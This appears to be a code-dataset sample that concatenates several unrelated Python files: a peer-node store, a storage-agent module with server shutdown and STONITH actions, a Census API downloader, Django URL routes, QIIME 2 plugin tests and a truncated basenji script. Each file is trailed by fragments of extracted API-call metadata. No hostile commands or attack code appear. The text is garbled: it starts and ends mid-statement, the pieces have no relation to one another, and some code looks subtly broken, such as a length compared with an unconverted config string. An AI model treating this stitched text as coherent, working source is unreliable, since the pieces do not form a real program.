bbox[3], ec='r',\n fc='none')\n", (4308, 4369), False, 'import matplotlib\n'), ((5527, 5556), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(10)', 'i_subplot'], {}), '(1, 10, i_subplot)\n', (5538, 5556), True, 'import matplotlib.pyplot as plt\n'), ((5621, 5747), 'matplotlib.pyplot.imshow', 'plt.imshow', (['self.test_imgs[i]'], {'cmap': '"""Greys"""', 'interpolation': '"""none"""', 'origin': '"""lower"""', 'extent': '[0, self.WIDTH, 0, self.HEIGHT]'}), "(self.test_imgs[i], cmap='Greys', interpolation='none', origin=\n 'lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n", (5631, 5747), True, 'import matplotlib.pyplot as plt\n'), ((676, 735), 'numpy.random.randint', 'np.random.randint', (['min_object_size', 'max_object_size'], {'size': '(2)'}), '(min_object_size, max_object_size, size=2)\n', (693, 735), True, 'import numpy as np\n'), ((756, 792), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.WIDTH - w)'], {}), '(0, self.WIDTH - w)\n', (773, 792), True, 'import numpy as np\n'), ((813, 850), 'numpy.random.randint', 'np.random.randint', (['(0)', '(self.HEIGHT - h)'], {}), '(0, self.HEIGHT - h)\n', (830, 850), True, 'import numpy as np\n'), ((1850, 1859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1857, 1859), True, 'import matplotlib.pyplot as plt\n'), ((2086, 2095), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2093, 2095), True, 'import matplotlib.pyplot as plt\n'), ((3811, 3900), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(bbox[0], bbox[1])', 'bbox[2]', 'bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r',\n fc='none')\n", (3839, 3900), False, 'import matplotlib\n'), ((4260, 4269), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4267, 4269), True, 'import matplotlib.pyplot as plt\n'), ((4669, 4678), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4676, 4678), True, 'import matplotlib.pyplot as plt\n'), ((4905, 4914), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4912, 4914), True, 'import matplotlib.pyplot as plt\n'), ((3791, 
3800), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3798, 3800), True, 'import matplotlib.pyplot as plt\n'), ((3910, 3919), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (3917, 3919), True, 'import matplotlib.pyplot as plt\n'), ((6151, 6260), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(pred_bbox[0], pred_bbox[1])', 'pred_bbox[2]', 'pred_bbox[3]'], {'ec': '"""r"""', 'fc': '"""none"""'}), "((pred_bbox[0], pred_bbox[1]), pred_bbox[2],\n pred_bbox[3], ec='r', fc='none')\n", (6179, 6260), False, 'import matplotlib\n'), ((6314, 6419), 'matplotlib.patches.Rectangle', 'matplotlib.patches.Rectangle', (['(exp_bbox[0], exp_bbox[1])', 'exp_bbox[2]', 'exp_bbox[3]'], {'ec': '"""b"""', 'fc': '"""none"""'}), "((exp_bbox[0], exp_bbox[1]), exp_bbox[2],\n exp_bbox[3], ec='b', fc='none')\n", (6342, 6419), False, 'import matplotlib\n'), ((6131, 6140), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6138, 6140), True, 'import matplotlib.pyplot as plt\n'), ((6294, 6303), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6301, 6303), True, 'import matplotlib.pyplot as plt\n'), ((6658, 6667), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (6665, 6667), True, 'import matplotlib.pyplot as plt\n')]
import pickle
import threading

from bmconfigparser import BMConfigParser
import state

knownNodesLock = threading.Lock()
knownNodes = {}

knownNodesTrimAmount = 2000


def saveKnownNodes(dirName = None):
    if dirName is None:
        dirName = state.appdata
    with knownNodesLock:
        with open(dirName + 'knownnodes.dat', 'wb') as output:
            pickle.dump(knownNodes, output)


def increaseRating(peer):
    increaseAmount = 0.1
    maxRating = 1
    with knownNodesLock:
        for stream in knownNodes.keys():
            try:
                knownNodes[stream][peer]["rating"] = min(knownNodes[stream][peer]["rating"] + increaseAmount, maxRating)
            except KeyError:
                pass


def decreaseRating(peer):
    decreaseAmount = 0.1
    minRating = -1
    with knownNodesLock:
        for stream in knownNodes.keys():
            try:
                knownNodes[stream][peer]["rating"] = max(knownNodes[stream][peer]["rating"] - decreaseAmount, minRating)
            except KeyError:
                pass


def trimKnownNodes(recAddrStream = 1):
    if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"):
        return
    with knownNodesLock:
        oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]
        for oldest in oldestList:
            del knownNodes[recAddrStream][oldest]
[ "bmconfigparser.BMConfigParser", "threading.Lock", "pickle.dump" ]
[((105, 121), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (119, 121), False, 'import threading\n'), ((360, 391), 'pickle.dump', 'pickle.dump', (['knownNodes', 'output'], {}), '(knownNodes, output)\n', (371, 391), False, 'import pickle\n'), ((1121, 1137), 'bmconfigparser.BMConfigParser', 'BMConfigParser', ([], {}), '()\n', (1135, 1137), False, 'from bmconfigparser import BMConfigParser\n')]
# Copyright (c) 2018 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.


import os

from chroma_agent.lib.shell import AgentShell
from chroma_agent.log import console_log
from chroma_agent.device_plugins.action_runner import CallbackAfterResponse
from chroma_agent.lib.pacemaker import PacemakerConfig


def ssi(runlevel):
    # force a manual failover by failing a node
    AgentShell.try_run(["sync"])
    AgentShell.try_run(["sync"])
    AgentShell.try_run(["init", runlevel])


def fail_node():
    ssi("0")


def stonith(node):
    p_cfg = PacemakerConfig()

    # TODO: signal that manager that a STONITH has been done so that it
    # doesn't treat it as an AWOL
    console_log.info("Rebooting %s per a STONITH request" % node)

    p_cfg.get_node(node).fence_reboot()


def shutdown_server(halt=True, at_time="now"):
    def _shutdown():
        console_log.info("Initiating server shutdown per manager request")
        # This will initiate a "nice" shutdown with a wall from root, etc.
        AgentShell.try_run(["shutdown", "-H" if halt else "-h", at_time])
        console_log.info("Terminating")
        os._exit(0)

    raise CallbackAfterResponse(None, _shutdown)


def reboot_server(at_time="now"):
    def _reboot():
        console_log.info("Initiating server reboot per manager request")
        # reboot(8) just calls shutdown anyhow.
        AgentShell.try_run(["shutdown", "-r", at_time])
        console_log.info("Terminating")
        os._exit(0)

    raise CallbackAfterResponse(None, _reboot)


ACTIONS = [reboot_server, shutdown_server, fail_node, stonith]
[ "chroma_agent.lib.shell.AgentShell.try_run", "chroma_agent.lib.pacemaker.PacemakerConfig", "os._exit", "chroma_agent.log.console_log.info", "chroma_agent.device_plugins.action_runner.CallbackAfterResponse" ]
[((453, 481), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (471, 481), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((486, 514), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['sync']"], {}), "(['sync'])\n", (504, 514), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((519, 557), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['init', runlevel]"], {}), "(['init', runlevel])\n", (537, 557), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((623, 640), 'chroma_agent.lib.pacemaker.PacemakerConfig', 'PacemakerConfig', ([], {}), '()\n', (638, 640), False, 'from chroma_agent.lib.pacemaker import PacemakerConfig\n'), ((758, 819), 'chroma_agent.log.console_log.info', 'console_log.info', (["('Rebooting %s per a STONITH request' % node)"], {}), "('Rebooting %s per a STONITH request' % node)\n", (774, 819), False, 'from chroma_agent.log import console_log\n'), ((1227, 1265), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_shutdown'], {}), '(None, _shutdown)\n', (1248, 1265), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((1570, 1606), 'chroma_agent.device_plugins.action_runner.CallbackAfterResponse', 'CallbackAfterResponse', (['None', '_reboot'], {}), '(None, _reboot)\n', (1591, 1606), False, 'from chroma_agent.device_plugins.action_runner import CallbackAfterResponse\n'), ((939, 1005), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server shutdown per manager request"""'], {}), "('Initiating server shutdown per manager request')\n", (955, 1005), False, 'from chroma_agent.log import console_log\n'), ((1089, 1154), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-H' if halt else '-h', at_time]"], {}), "(['shutdown', '-H' if halt else '-h', at_time])\n", (1107, 1154), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1164, 1195), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1180, 1195), False, 'from chroma_agent.log import console_log\n'), ((1204, 1215), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1212, 1215), False, 'import os\n'), ((1329, 1393), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Initiating server reboot per manager request"""'], {}), "('Initiating server reboot per manager request')\n", (1345, 1393), False, 'from chroma_agent.log import console_log\n'), ((1450, 1497), 'chroma_agent.lib.shell.AgentShell.try_run', 'AgentShell.try_run', (["['shutdown', '-r', at_time]"], {}), "(['shutdown', '-r', at_time])\n", (1468, 1497), False, 'from chroma_agent.lib.shell import AgentShell\n'), ((1507, 1538), 'chroma_agent.log.console_log.info', 'console_log.info', (['"""Terminating"""'], {}), "('Terminating')\n", (1523, 1538), False, 'from chroma_agent.log import console_log\n'), ((1547, 1558), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1555, 1558), False, 'import os\n')]
#! /usr/bin/env python
# -*- coding: utf-8 -*
"""
A base class that governs how to download and process tables from a Census API table.
"""
import os
import logging
import pathlib
from . import geotypes
from . import decorators
logger = logging.getLogger(__name__)


class BaseTableConfig(object):
    """
    Configures how to download and process tables from the Census API.
    """
    THIS_DIR = pathlib.Path(__file__).parent
    PARENT_DIR = THIS_DIR.parent

    # All available years
    YEAR_LIST = [
        2017,
        2016,
        2015,
        2014,
        2013,
        2012,
        2011,
        2010,
        2009
    ]

    # All available geographies
    GEOTYPE_LIST = (
        "nationwide",
        "regions",
        "divisions",
        "states",
        "congressional_districts",
        "state_legislative_upper_districts",
        "state_legislative_lower_districts",
        "counties",
        "places",
        "urban_areas",
        "msas",
        "csas",
        "pumas",
        "nectas",
        "cnectas",
        "aiannh_homelands",
        "tracts",
        "zctas",
        "unified_school_districts",
        "elementary_school_districts",
        "secondary_school_districts"
    )

    def __init__(
        self,
        api_key=None,
        source="acs5",
        years=None,
        data_dir=None,
        force=False
    ):
        """
        Configuration.
        """
        # Set the inputs
        self.CENSUS_API_KEY = os.getenv("CENSUS_API_KEY", api_key)
        if not self.CENSUS_API_KEY:
            raise NotImplementedError("Census API key required. Pass it as the first argument.")
        self.source = source
        self.force = force

        #
        # Allow custom years for data download, defaulting to most recent year
        #

        # If they want all the years, give it to them.
        if years == "all":
            self.years_to_download = self.YEAR_LIST
        # If the user provides a year give them that.
        elif isinstance(years, int):
            self.years_to_download = [years]
        # Or if they provide years as a list, give those then.
        elif isinstance(years, list):
            self.years_to_download = list(map(int, years))
        # If they provided nothing, default to the latest year of data
        elif years is None:
            self.years_to_download = [max(self.YEAR_LIST), ]

        # Validate the years
        for year in self.years_to_download:
            if year not in self.YEAR_LIST:
                error_msg = ("Data only available for the years"
                             f"{self.YEAR_LIST[-1]}-{self.YEAR_LIST[0]}.")
                raise NotImplementedError(error_msg)

        # Set the data directories
        if data_dir:
            self.data_dir = pathlib.Path(str(data_dir))
        else:
            self.data_dir = self.PARENT_DIR.joinpath("data")
        self.raw_data_dir = self.data_dir.joinpath("raw")
        self.processed_data_dir = self.data_dir.joinpath("processed")

        # Make sure they exist
        if not self.data_dir.exists():
            self.data_dir.mkdir()
        if not self.raw_data_dir.exists():
            self.raw_data_dir.mkdir()
        if not self.processed_data_dir.exists():
            self.processed_data_dir.mkdir()

    @property
    def censusreporter_url(self):
        """
        Returns the URL of the Census Reporter page explaining the ACS table.
        """
        return f"https://censusreporter.org/tables/{self.RAW_TABLE_NAME}/"

    #
    # Geotype downloaders
    #

    @decorators.downloader
    def download_nationwide(self):
        """
        Download nationwide data.
        """
        return geotypes.NationwideDownloader

    @decorators.downloader
    def download_regions(self):
        """
        Download data for all regions.
        """
        return geotypes.RegionsDownloader

    @decorators.downloader
    def download_divisions(self):
        """
        Download data for all divisions.
        """
        return geotypes.DivisionsDownloader

    @decorators.downloader
    def download_states(self):
        """
        Download data for all states.
        """
        return geotypes.StatesDownloader

    @decorators.downloader
    def download_congressional_districts(self):
        """
        Download data for all Congressional districts.
        """
        return geotypes.CongressionalDistrictsDownloader

    @decorators.downloader
    def download_state_legislative_upper_districts(self):
        """
        Download data for all Census upper legislative districts in the provided state.
        """
        return geotypes.StateLegislativeUpperDistrictsDownloader

    @decorators.downloader
    def download_state_legislative_lower_districts(self):
        """
        Download data for all Census lower legislative districts in the provided state.
        """
        return geotypes.StateLegislativeLowerDistrictsDownloader

    @decorators.downloader
    def download_counties(self):
        """
        Download data for all counties.
        """
        return geotypes.CountiesDownloader

    @decorators.downloader
    def download_places(self):
        """
        Download data for all Census designated places.
        """
        return geotypes.PlacesDownloader

    @decorators.downloader
    def download_urban_areas(self):
        """
        Download data for all urban areas
        """
        return geotypes.UrbanAreasDownloader

    @decorators.downloader
    def download_msas(self):
        """
        Download data for Metropolitian Statistical Areas.
        """
        return geotypes.MsasDownloader

    @decorators.downloader
    def download_csas(self):
        """
        Download data for Combined Statistical Areas.
        """
        return geotypes.CsasDownloader

    @decorators.downloader
    def download_pumas(self):
        """
        Download data for Public Use Microdata Areas.
        """
        return geotypes.PumasDownloader

    @decorators.downloader
    def download_nectas(self):
        """
        Download data for New England cities and towns.
        """
        return geotypes.NectasDownloader

    @decorators.downloader
    def download_cnectas(self):
        """
        Download data for combined New England cities and towns.
        """
        return geotypes.CnectasDownloader

    @decorators.downloader
    def download_aiannh_homelands(self):
        """
        Download data for American Indian home lands.
        """
        return geotypes.AiannhHomelandsDownloader

    @decorators.downloader
    def download_tracts(self):
        """
        Download data for all Census tracts in the provided state.
        """
        return geotypes.TractsDownloader

    @decorators.downloader
    def download_zctas(self):
        """
        Download data for Zip Code Tabulation Areas
        """
        return geotypes.ZctasDownloader

    @decorators.downloader
    def download_unified_school_districts(self):
        """
        Download data for unified school districts.
        """
        return geotypes.UnifiedSchoolDistrictsDownloader

    @decorators.downloader
    def download_elementary_school_districts(self):
        """
        Download data for elementary school districts.
        """
        return geotypes.ElementarySchoolDistrictsDownloader

    @decorators.downloader
    def download_secondary_school_districts(self):
        """
        Download data for secondary school districts.
        """
        return geotypes.SecondarySchoolDistrictsDownloader

    def download_everything(self):
        """
        Download 'em all.
        """
        for geo in self.GEOTYPE_LIST:
            print(geo)
            # Get the downloader function
            dl = getattr(self, f"download_{geo}", None)
            # Validate it
            if not dl or not callable(dl):
                raise NotImplementedError(f"Invalid geography type: {geo}")
            # Run it
            try:
                dl()
            except NotImplementedError:
                pass
[ "logging.getLogger", "os.getenv", "pathlib.Path" ]
[((237, 264), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (254, 264), False, 'import logging\n'), ((400, 422), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (412, 422), False, 'import pathlib\n'), ((1474, 1510), 'os.getenv', 'os.getenv', (['"""CENSUS_API_KEY"""', 'api_key'], {}), "('CENSUS_API_KEY', api_key)\n", (1483, 1510), False, 'import os\n')]
from django.conf.urls import include, url

from . import views

urlpatterns = [
    url(r'^settings$', views.household_dashboard, name='household_dashboard'),
    url(r'^myinfo$', views.my_info, name='my_info'),
    url(r'^profile$', views.household_profile, name='maintain_household'),
    url(r'^members$', views.household_members, name='maintain_members'),
    url(r'^vehicles$', views.household_vehicles, name='maintain_vehicles'),
    url(r'^ajax/models-by-make/(?P<make_id>\d+)/$', views.ajax_models_by_make),
    url(r'^ajax/makes-by-type/(?P<type_id>\d+)/$', views.ajax_makes_by_type),
    url(r'^ajax/add-make/(?P<type_key>\d+)/(?P<make>[\w ]{1,50})/$', views.ajax_add_make),
    url(r'^ajax/add-model/(?P<make_key>\d+)/(?P<model>[\w -]{1,128})/$', views.ajax_add_model),
    url(r'^ajax/delete-invite/$', views.ajax_delete_invite),
    url(r'^ajax/change-member-status/$', views.ajax_change_member_status),
]
[ "django.conf.urls.url" ]
[((83, 155), 'django.conf.urls.url', 'url', (['"""^settings$"""', 'views.household_dashboard'], {'name': '"""household_dashboard"""'}), "('^settings$', views.household_dashboard, name='household_dashboard')\n", (86, 155), False, 'from django.conf.urls import include, url\n'), ((162, 208), 'django.conf.urls.url', 'url', (['"""^myinfo$"""', 'views.my_info'], {'name': '"""my_info"""'}), "('^myinfo$', views.my_info, name='my_info')\n", (165, 208), False, 'from django.conf.urls import include, url\n'), ((215, 283), 'django.conf.urls.url', 'url', (['"""^profile$"""', 'views.household_profile'], {'name': '"""maintain_household"""'}), "('^profile$', views.household_profile, name='maintain_household')\n", (218, 283), False, 'from django.conf.urls import include, url\n'), ((290, 356), 'django.conf.urls.url', 'url', (['"""^members$"""', 'views.household_members'], {'name': '"""maintain_members"""'}), "('^members$', views.household_members, name='maintain_members')\n", (293, 356), False, 'from django.conf.urls import include, url\n'), ((363, 432), 'django.conf.urls.url', 'url', (['"""^vehicles$"""', 'views.household_vehicles'], {'name': '"""maintain_vehicles"""'}), "('^vehicles$', views.household_vehicles, name='maintain_vehicles')\n", (366, 432), False, 'from django.conf.urls import include, url\n'), ((439, 513), 'django.conf.urls.url', 'url', (['"""^ajax/models-by-make/(?P<make_id>\\\\d+)/$"""', 'views.ajax_models_by_make'], {}), "('^ajax/models-by-make/(?P<make_id>\\\\d+)/$', views.ajax_models_by_make)\n", (442, 513), False, 'from django.conf.urls import include, url\n'), ((519, 591), 'django.conf.urls.url', 'url', (['"""^ajax/makes-by-type/(?P<type_id>\\\\d+)/$"""', 'views.ajax_makes_by_type'], {}), "('^ajax/makes-by-type/(?P<type_id>\\\\d+)/$', views.ajax_makes_by_type)\n", (522, 591), False, 'from django.conf.urls import include, url\n'), ((597, 688), 'django.conf.urls.url', 'url', (['"""^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$"""', 'views.ajax_add_make'], {}), "('^ajax/add-make/(?P<type_key>\\\\d+)/(?P<make>[\\\\w ]{1,50})/$', views.\n ajax_add_make)\n", (600, 688), False, 'from django.conf.urls import include, url\n'), ((688, 784), 'django.conf.urls.url', 'url', (['"""^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$"""', 'views.ajax_add_model'], {}), "('^ajax/add-model/(?P<make_key>\\\\d+)/(?P<model>[\\\\w -]{1,128})/$', views\n .ajax_add_model)\n", (691, 784), False, 'from django.conf.urls import include, url\n'), ((784, 838), 'django.conf.urls.url', 'url', (['"""^ajax/delete-invite/$"""', 'views.ajax_delete_invite'], {}), "('^ajax/delete-invite/$', views.ajax_delete_invite)\n", (787, 838), False, 'from django.conf.urls import include, url\n'), ((845, 913), 'django.conf.urls.url', 'url', (['"""^ajax/change-member-status/$"""', 'views.ajax_change_member_status'], {}), "('^ajax/change-member-status/$', views.ajax_change_member_status)\n", (848, 913), False, 'from django.conf.urls import include, url\n')]
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------

from unittest import TestCase, main
import qiime2
import os

from q2_qemistree import MGFDirFmt, SiriusDirFmt, ZodiacDirFmt, OutputDirs
from q2_qemistree import (compute_fragmentation_trees,
                          rerank_molecular_formulas,
                          predict_fingerprints)
from q2_qemistree._fingerprint import artifactory


class FingerprintTests(TestCase):
    def setUp(self):
        THIS_DIR = os.path.dirname(os.path.abspath(__file__))
        self.badsirpath = os.path.join(THIS_DIR, 'data/foo/bin')
        self.goodsirpath = os.path.join(THIS_DIR, 'data/'
                                        'sirius-linux64-headless-4.0.1/bin')
        # MassSpectrometryFeatures
        self.ions = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/sirius.mgf.qza'))
        # SiriusFolder
        self.sirout = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/sirFolder.qza'))
        # ZodiacFolder
        self.zodout = qiime2.Artifact.load(os.path.join(THIS_DIR, 'data/zodFolder.qza'))

    def test_artifactory(self):
        # everything is working fine
        obs = os.environ.get('_JAVA_OPTIONS', '')
        res = artifactory(self.goodsirpath, ['--help'],
                          constructor=OutputDirs, java_flags='-Xms2G')
        self.assertEqual(obs, os.environ.get('_JAVA_OPTIONS'))
        self.assertTrue(isinstance(res, OutputDirs))
        # exceptions are raised
        with self.assertRaises(OSError):
            res = artifactory(self.badsirpath, ['--help'],
                              constructor=OutputDirs)

    def test_fragmentation_trees(self):
        ions = self.ions.view(MGFDirFmt)
        result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
                                             features=ions,
                                             ppm_max=15,
                                             profile='orbitrap')
        contents = os.listdir(result.get_path())
        self.assertTrue(('version.txt' in contents))

    def test_fragmentation_trees_negative_ionization(self):
        ions = self.ions.view(MGFDirFmt)
        result = compute_fragmentation_trees(sirius_path=self.goodsirpath,
                                             features=ions,
                                             ppm_max=15,
                                             profile='orbitrap',
                                             ionization_mode='negative')
        contents = os.listdir(result.get_path())
        self.assertTrue(('version.txt' in contents))

    def test_fragmentation_trees_exception(self):
        ions = self.ions.view(MGFDirFmt)
        with self.assertRaises(ValueError):
            compute_fragmentation_trees(sirius_path=self.goodsirpath,
                                        features=ions,
                                        ppm_max=15,
                                        profile='orbitrap',
                                        ionization_mode='n3gativ3')

    def test_reranking(self):
        ions = self.ions.view(MGFDirFmt)
        sirout = self.sirout.view(SiriusDirFmt)
        result = rerank_molecular_formulas(sirius_path=self.goodsirpath,
                                           fragmentation_trees=sirout,
                                           features=ions)
        contents = os.listdir(result.get_path())
        self.assertTrue(('zodiac_summary.csv' in contents))

    def test_fingerid(self):
        zodout = self.zodout.view(ZodiacDirFmt)
        result = predict_fingerprints(sirius_path=self.goodsirpath,
                                      molecular_formulas=zodout, ppm_max=15)
        contents = os.listdir(result.get_path())
        self.assertTrue(('summary_csi_fingerid.csv' in contents))


if __name__ == '__main__':
    main()
[ "q2_qemistree.rerank_molecular_formulas", "os.path.join", "os.environ.get", "q2_qemistree.predict_fingerprints", "q2_qemistree.compute_fragmentation_trees", "unittest.main", "q2_qemistree._fingerprint.artifactory", "os.path.abspath" ]
[((4200, 4206), 'unittest.main', 'main', ([], {}), '()\n', (4204, 4206), False, 'from unittest import TestCase, main\n'), ((836, 874), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/foo/bin"""'], {}), "(THIS_DIR, 'data/foo/bin')\n", (848, 874), False, 'import os\n'), ((902, 966), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius-linux64-headless-4.0.1/bin"""'], {}), "(THIS_DIR, 'data/sirius-linux64-headless-4.0.1/bin')\n", (914, 966), False, 'import os\n'), ((1607, 1642), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""', '""""""'], {}), "('_JAVA_OPTIONS', '')\n", (1621, 1642), False, 'import os\n'), ((1657, 1747), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.goodsirpath', "['--help']"], {'constructor': 'OutputDirs', 'java_flags': '"""-Xms2G"""'}), "(self.goodsirpath, ['--help'], constructor=OutputDirs,\n java_flags='-Xms2G')\n", (1668, 1747), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((2171, 2279), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap')\n", (2198, 2279), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((2587, 2723), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""negative"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='negative')\n", (2614, 2723), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3535, 3638), 'q2_qemistree.rerank_molecular_formulas', 'rerank_molecular_formulas', ([], {'sirius_path': 'self.goodsirpath', 'fragmentation_trees': 'sirout', 'features': 'ions'}), '(sirius_path=self.goodsirpath, fragmentation_trees\n =sirout, features=ions)\n', (3560, 3638), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((3924, 4018), 'q2_qemistree.predict_fingerprints', 'predict_fingerprints', ([], {'sirius_path': 'self.goodsirpath', 'molecular_formulas': 'zodout', 'ppm_max': '(15)'}), '(sirius_path=self.goodsirpath, molecular_formulas=\n zodout, ppm_max=15)\n', (3944, 4018), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n'), ((783, 808), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (798, 808), False, 'import os\n'), ((1086, 1131), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirius.mgf.qza"""'], {}), "(THIS_DIR, 'data/sirius.mgf.qza')\n", (1098, 1131), False, 'import os\n'), ((1253, 1297), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/sirFolder.qza"""'], {}), "(THIS_DIR, 'data/sirFolder.qza')\n", (1265, 1297), False, 'import os\n'), ((1421, 1465), 'os.path.join', 'os.path.join', (['THIS_DIR', '"""data/zodFolder.qza"""'], {}), "(THIS_DIR, 'data/zodFolder.qza')\n", (1433, 1465), False, 'import os\n'), ((1800, 1831), 'os.environ.get', 'os.environ.get', (['"""_JAVA_OPTIONS"""'], {}), "('_JAVA_OPTIONS')\n", (1814, 1831), False, 'import os\n'), ((1977, 2041), 'q2_qemistree._fingerprint.artifactory', 'artifactory', (['self.badsirpath', "['--help']"], {'constructor': 'OutputDirs'}), 
"(self.badsirpath, ['--help'], constructor=OutputDirs)\n", (1988, 2041), False, 'from q2_qemistree._fingerprint import artifactory\n'), ((3105, 3241), 'q2_qemistree.compute_fragmentation_trees', 'compute_fragmentation_trees', ([], {'sirius_path': 'self.goodsirpath', 'features': 'ions', 'ppm_max': '(15)', 'profile': '"""orbitrap"""', 'ionization_mode': '"""n3gativ3"""'}), "(sirius_path=self.goodsirpath, features=ions,\n ppm_max=15, profile='orbitrap', ionization_mode='n3gativ3')\n", (3132, 3241), False, 'from q2_qemistree import compute_fragmentation_trees, rerank_molecular_formulas, predict_fingerprints\n')]
#!/usr/bin/env python # Copyright 2017 Calico LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # https://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ========================================================================= from __future__ import print_function from optparse import OptionParser import copy, os, pdb, random, shutil, subprocess, time import h5py import matplotlib matplotlib.use('PDF') import matplotlib.pyplot as plt import numpy as np import pandas as pd from scipy.stats import spearmanr import seaborn as sns from sklearn import preprocessing import tensorflow as tf import basenji ''' basenji_motifs.py Collect statistics and make plots to explore the first convolution layer of the given model using the given sequences. ''' weblogo_opts = '-X NO -Y NO --errorbars NO --fineprint ""' weblogo_opts += ' -C "#CB2026" A A' weblogo_opts += ' -C "#34459C" C C' weblogo_opts += ' -C "#FBB116" G G' weblogo_opts += ' -C "#0C8040" T T' ################################################################################ # main ################################################################################ def main(): usage = 'usage: %prog [options] <params_file> <model_file> <data_file>' parser = OptionParser(usage) parser.add_option( '-a', dest='act_t', default=0.5, type='float', help= 'Activation threshold (as proportion of max) to consider for PWM [Default: %default]' ) parser.add_option( '-d', dest='model_hdf5_file', default=None, help='Pre-computed model output as HDF5.') parser.add_option('-o', dest='out_dir', default='.') parser.add_option( '-m', dest='meme_db', default='%s/data/motifs/Homo_sapiens.meme' % os.environ['BASENJIDIR'], help='MEME database used to annotate motifs') parser.add_option( '-p', dest='plot_heats', default=False, action='store_true', help= 'Plot heat maps describing filter activations in the test sequences [Default: %default]' ) parser.add_option( '-s', dest='sample', default=None, type='int', help='Sample sequences from the test set [Default:%default]') parser.add_option( '-t', dest='trim_filters', default=False, action='store_true', help='Trim uninformative positions off the filter ends [Default: %default]' ) (options, args) = parser.parse_args() if len(args) != 3: parser.error( 'Must provide Basenji parameters and model files and test data in HDF5' ' format.' 
